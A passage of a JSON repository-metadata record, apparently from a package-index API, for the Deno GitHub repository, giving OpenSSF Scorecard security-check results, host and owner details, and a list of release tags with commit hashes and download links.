reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"